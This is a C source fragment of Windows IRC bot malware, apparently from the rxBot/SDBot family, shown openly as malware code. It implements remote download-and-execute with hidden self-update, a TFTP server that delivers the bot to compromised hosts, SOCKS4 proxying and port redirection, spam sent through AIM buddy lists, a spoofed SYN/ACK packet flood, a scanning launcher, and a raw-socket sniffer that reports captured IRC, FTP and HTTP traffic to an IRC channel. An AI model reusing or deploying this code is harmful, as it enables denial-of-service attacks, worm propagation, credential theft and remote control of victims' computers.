ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;
redirect.cgotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
threads[redirect.cthreadnum].csock = threads[threadnum].sock;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
while (redirect.cgotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
break;
}
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
}
break;
} while (1);
fclosesocket(threads[threadnum].sock);
fclosesocket(ssock);
clearthread(threadnum);
ExitThread(0);
}
// function for downloading files/updating
DWORD WINAPI DownloadThread(LPVOID param)
{
char buffer[IRCLINE];
DWORD r, d, start, total, speed;
DOWNLOAD dl = *((DOWNLOAD *)param);
DOWNLOAD *dls = (DOWNLOAD *)param;
dls->gotinfo = true;
HANDLE fh = fInternetOpenUrl(ih, dl.url, NULL, 0, 0, 0);
if (fh != NULL) {
// open the file
HANDLE f = CreateFile(dl.dest, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
// make sure that our file handle is valid
if (f < (HANDLE)1) {
sprintf(buffer,"[DOWNLOAD]: Couldn't open file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
clearthread(dl.threadnum);
ExitThread(EXIT_FAILURE);
}
total = 0;
start = GetTickCount();
char *fileTotBuff=(char *)malloc(512000); //FIX ME: Only checks first 500 kb
do {
memset(buffer, 0, sizeof(buffer));
fInternetReadFile(fh, buffer, sizeof(buffer), &r);
if (dl.encrypted)
Xorbuff(buffer,r);
WriteFile(f, buffer, r, &d, NULL);
if ((total) < 512000) {
//We have free bytes...
//512000-total
unsigned int bytestocopy;
bytestocopy=512000-total;
if (bytestocopy>r)
bytestocopy=r;
memcpy(&fileTotBuff[total],buffer,bytestocopy);
}
total+=r;
if (dl.filelen)
if (total>dl.filelen)
break; //er, we have a problem... filesize is too big.
if (dl.update != 1)
sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: File download: %s (%dKB transferred).", dl.url, total / 1024);
else
sprintf(threads[dl.threadnum].name, "[DOWNLOAD]: Update: %s (%dKB transferred).", dl.url, total / 1024);
} while (r > 0);
bool goodfile=true;
if (dl.filelen) {
if (total!=dl.filelen) {
goodfile=false;
sprintf(buffer,"[DOWNLOAD]: Filesize is incorrect: (%d != %d).", total, dl.filelen);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
speed = total / (((GetTickCount() - start) / 1000) + 1);
CloseHandle(f);
/* if (dl.expectedcrc) {
unsigned long crc,crclength;
sprintf(buffer,"crc32([%lu], [%d])\n",fileTotBuff,total);
crclength=total;
if (crclength>512000) crclength=512000;
crc=crc32(fileTotBuff,crclength);
if (crc!=dl.expectedcrc) {
goodfile=false;
irc_privmsg(dl.sock,dl.chan,"CRC Failed!",dl.notice);
}
} */
free(fileTotBuff);
if (dl.expectedcrc) {
unsigned long crc=crc32f(dl.dest);
if (crc!=dl.expectedcrc) {
goodfile=false;
sprintf(buffer,"[DOWNLOAD]: CRC Failed (%d != %d).", crc, dl.expectedcrc);
irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
if (goodfile==false)
goto badfile;
//download isn't an update
if (dl.update != 1) {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (dl.run == 1) {
CreateProc(dl.dest,NULL,SW_SHOW);
if (!dl.silent) {
sprintf(buffer,"[DOWNLOAD]: Opened: %s.",dl.dest);
irc_privmsg(dl.sock,dl.chan,buffer,dl.notice);
addlog(buffer);
}
}
// download is an update
} else {
sprintf(buffer, "[DOWNLOAD]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.", total / 1024.0, dl.dest, speed / 1024.0);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
if (CreateProc(dl.dest,NULL,SW_HIDE) != 0) {
fWSACleanup();
uninstall();
ExitProcess(EXIT_SUCCESS);
} else {
sprintf(buffer,"[DOWNLOAD]: Update failed: Error executing file: %s.",dl.dest);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
}
} else {
sprintf(buffer,"[DOWNLOAD]: Bad URL, or DNS Error: %s.",dl.url);
if (!dl.silent) irc_privmsg(dl.sock, dl.chan, buffer, dl.notice);
addlog(buffer);
}
badfile:
fInternetCloseHandle(fh);
clearthread(dl.threadnum);
ExitThread(EXIT_SUCCESS);
}
DWORD WINAPI VisitThread(LPVOID param)
{
HINTERNET ch = 0, req = 0;
const char *accept = "*/*";
char vhost[128], vuser[128], vpass[128], vpath[256], sendbuf[IRCLINE];
NTHREAD visit = *((NTHREAD *)param);
NTHREAD *visits = (NTHREAD *)param;
IRC* irc=(IRC*)visit.conn;
visits->gotinfo = TRUE;
// zero out string varaiables
memset(vhost, 0, sizeof(vhost));
memset(vuser, 0, sizeof(vuser));
memset(vpass, 0, sizeof(vpass));
memset(vpath, 0, sizeof(vpath));
// zero out url structure and set options
URL_COMPONENTS url;
memset(&url, 0, sizeof(url));
url.dwStructSize = sizeof(url);
url.dwHostNameLength = 1;
url.dwUserNameLength = 1;
url.dwPasswordLength = 1;
url.dwUrlPathLength = 1;
do {
// crack the url (break it into its main parts)
if (!fInternetCrackUrl(visit.data1, strlen(visit.data1), 0, &url)) {
sprintf(sendbuf,"%s Invalid URL.", visit_title);
break;
}
// copy url parts into variables
if (url.dwHostNameLength > 0)
strncpy(vhost, url.lpszHostName, url.dwHostNameLength);
int vport = url.nPort;
if (url.dwUserNameLength > 0)
strncpy(vuser, url.lpszUserName, url.dwUserNameLength);
if (url.dwPasswordLength > 0)
strncpy(vpass, url.lpszPassword, url.dwPasswordLength);
if (url.dwUrlPathLength > 0)
strncpy(vpath, url.lpszUrlPath, url.dwUrlPathLength);
ch = fInternetConnect(ih, vhost,(unsigned short)vport, vuser, vpass, INTERNET_SERVICE_HTTP, 0, 0);
if (ch == NULL) {
sprintf(sendbuf,"%s Could not open a connection.", visit_title);
break;
}
req = fHttpOpenRequest(ch, NULL, vpath, NULL, visit.data2, &accept, INTERNET_FLAG_NO_UI, 0);
if (req == NULL) {
sprintf(sendbuf,"%s Failed to connect to HTTP server.", visit_title);
break;
}
if (fHttpSendRequest(req, NULL, 0, NULL, 0))
sprintf(sendbuf,"%s URL visited.", visit_title);
else
sprintf(sendbuf,"%s Failed to get requested URL from HTTP server.", visit_title);
} while(0);
if (!visit.silent) irc->pmsg(visit.target,sendbuf);
fInternetCloseHandle(ch);
fInternetCloseHandle(req);
clearthread(visit.threadnum);
ExitThread(0);
return 0;
}
DWORD WINAPI Socks4ClientThread(LPVOID param)
{
SOCKS4 socks4 = *((SOCKS4 *)param);
SOCKS4 *socks4p = (SOCKS4 *)param;
socks4p->cgotinfo = TRUE;
int threadnum = socks4.cthreadnum;
SOCKS4HEADER hdr;
TIMEVAL timeout;
timeout.tv_sec = 5;
timeout.tv_usec = 0;
fd_set fd;
FD_ZERO(&fd);
FD_SET(threads[threadnum].sock, &fd);
if (fselect(0, &fd, NULL, NULL, &timeout) == 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) {
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
// FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing)
if (socks4.userid[0] != '\0') {
if (strcmp(hdr.userid, socks4.userid) != 0) {
addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid);
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT_USERID;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
}
SOCKADDR_IN tsin;
memset(&tsin, 0, sizeof(tsin));
tsin.sin_family = AF_INET;
tsin.sin_port = hdr.destport;
tsin.sin_addr.s_addr = hdr.destaddr;
SOCKET tsock;
if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) {
addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError());
hdr.vn = 0;
hdr.cd = SOCKS4_REJECT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
hdr.vn = 0;
hdr.cd = SOCKS4_GRANT;
memset(&hdr.userid, 0, 1024);
fsend(threads[threadnum].sock, (char *)&hdr, 8, 0);
TransferLoop(tsock, threads[threadnum].sock);
fclosesocket(tsock);
fclosesocket(threads[threadnum].sock);
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI tftpserver(LPVOID param)
{
FILE *fp;
char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
int err=1;
TFTP tftp = *((TFTP *)param);
TFTP *tftps = (TFTP *)param;
tftps->gotinfo = TRUE;
tftp.threads++;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
threads[tftp.threadnum].sock=ssock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)tftp.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
Sleep(5000);
tftp.threads--;
return tftpserver(param);
}
if ((fp=fopen(tftp.filename, "rb")) == NULL) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
while(err>0 && tftps->gotinfo && fp) {
TIMEVAL timeout;
timeout.tv_sec=5;
timeout.tv_usec=5000;
fd_set fd;
FD_ZERO(&fd);
FD_SET(ssock,&fd);
memset(buffer,0,sizeof(buffer));
if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
SOCKADDR_IN csin;
int csin_len=sizeof(csin);
char f_buffer[BLOCKSIZE+4]="";
err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
sprintf(IP,finet_ntoa(csin.sin_addr));
// parse buffer
if(buffer[0]==0 && buffer[1]==1) { //RRQ
char *tmprequest=buffer,*tmptype=buffer;
tmprequest+=2; //skip the opcode
tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
// for loop to add a \0 to the end of the requestname
sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
addlog(buffer);
} else { // good rrq packet send first data packet
fseek(fp, 0, SEEK_SET);
f_buffer[0]=0; f_buffer[1]=3; // DATA
f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
//sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else if(buffer[0]==0 && buffer[1]==4) { // ACK
// send next packet
unsigned int blocks;
BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
f_buffer[0]=0; f_buffer[1]=3; // DATA
if (b2==255) { // DATA BLOCK #
f_buffer[2]=++b1;
f_buffer[3]=b2=0;
} else {
f_buffer[2]=b1;
f_buffer[3]=++b2;
}
blocks=(b1 * 256) + b2 - 1;
// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
if (err==0) {
sprintf(sendbuf,"[TFTP]: I just owned: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else { // we dont support any other commands
fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
}
} else
continue;
}
// check for ack, then msg irc on transfer complete
fclosesocket(ssock);
fclose(fp);
tftp.threads--;
if(tftps->gotinfo == FALSE) {
clearthread(tftp.threadnum);
ExitThread(0);
}
Sleep(1000);
return tftpserver(param);
}
//void TritonMessage(char* szMsg, unsigned int iDelay)
DWORD WINAPI TritonMessage(LPVOID param)
{
NTHREAD tim = *((NTHREAD *)param);
NTHREAD *tims = (NTHREAD *)param;
tims->gotinfo = TRUE;
IRC* irc=(IRC*)tim.conn;
char szMsg[512];
strncpy(szMsg,tim.data1,sizeof(szMsg));
bool bDone = false;
char szWindowText[256], szLastBuddy[256];
ZeroMemory(&szLastBuddy, 256);
HWND hTray = FindWindow("imAppSystemTrayHandler", "imApp"), hBuddyList = NULL, hKill = NULL;
if(IsWindow(hTray))
{
SendMessage(hTray, 0x0065, 0x00000141, 0x00000203);
do {
hBuddyList = FindWindow("__oxFrame.class__", "AIM");
} while(!IsWindow(hBuddyList));
do {
hKill = FindWindowEx(NULL, hKill, "__oxFrame.class__", NULL);
ZeroMemory(&szWindowText, 256);
GetWindowText(hKill, szWindowText, 256);
if(strcmp(szWindowText, "AIM") != 0)
SendMessage(hKill, WM_CLOSE, 0, 0);
} while(IsWindow(hKill));
TritonSetupList(hBuddyList, false);
while(!bDone)
{
Sleep(3000);
FocusWindow(hBuddyList);
SysKey(hBuddyList, VK_DOWN, 1);
SysKey(hBuddyList, VK_RETURN, 1);
HWND hWindow = NULL;
do {
hWindow = FindWindowEx(NULL, hWindow, "__oxFrame.class__", NULL);
if(IsWindow(hWindow))
{
ZeroMemory(&szWindowText, 256);
GetWindowText(hWindow, szWindowText, 256);
if((strcmp(szWindowText, " IMs") == 0) ||
(strstr(szWindowText, "IM with ") != NULL))
{
if(strcmp(szLastBuddy, szWindowText) == 0)
bDone = true;
else {
strncpy(szLastBuddy, szWindowText, 256);
FocusWindow(hWindow);
TritonIm(hWindow, szMsg);
}
SendMessage(hWindow, WM_CLOSE, 0, 0);
}
}
} while(IsWindow(hWindow));
}
TritonSetupList(hBuddyList, true);
}
clearthread(tim.threadnum);
ExitThread(0);
return 0;
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons((unsigned short)tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
DWORD WINAPI AdvScanner(LPVOID param)
{
char buffer[LOGLINE];
//char szSelfExe[MAX_PATH];
ADVSCAN scan = *((ADVSCAN *)param);
ADVSCAN *scanp = (ADVSCAN *)param;
scanp->gotinfo = TRUE;
advinfo[scan.threadnum].ip = finet_addr(scan.ip);
CheckServers(scan);
if (findthreadid(SCAN_THREAD) == 1) {
DeleteCriticalSection(&CriticalSection); // just in case
if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
// failed to initialize CriticalSection
sprintf(buffer," s can -- Failed to initialize critical section.");
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
return 0;
}
}
advinfo[scan.threadnum].info = TRUE;
for (unsigned int i=1;i<=(scan.threads);i++) {
scan.cthreadid = i;
sprintf(buffer," s can -- %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid);
scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
threads[scan.cthreadnum].parent = scan.threadnum;
if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
while (scan.cgotinfo == FALSE)
Sleep(30);
} else {
sprintf(buffer, " s can -- Failed to start worker thread, error: <%d>.", GetLastError());
addlog(buffer);
}
Sleep(30);
}
if (scan.minutes != 0)
Sleep(60000*scan.minutes);
else
while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);
IN_ADDR in;
in.s_addr = advinfo[scan.threadnum].ip;
sprintf(buffer," s can -- Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
addlog(buffer);
advinfo[scan.threadnum].info = FALSE;
Sleep(3000);
if (findthreadid(SCAN_THREAD) == 1)
DeleteCriticalSection(&CriticalSection);
clearthread(scan.threadnum);
ExitThread(0);
}
DWORD WINAPI SnifferThread(LPVOID param) {
SNIFFER sniff = *((SNIFFER *)param);
SNIFFER *sniffs = (SNIFFER *)param;
sniffs->gotinfo = TRUE;
char sendbuf[IRCLINE];
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
int optval=1; DWORD dwBytesRet;
if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(1)
{
// Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Read the raw packet
iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<(int)strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousHTTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousVULN(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
}
}
}
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
return 0;
}
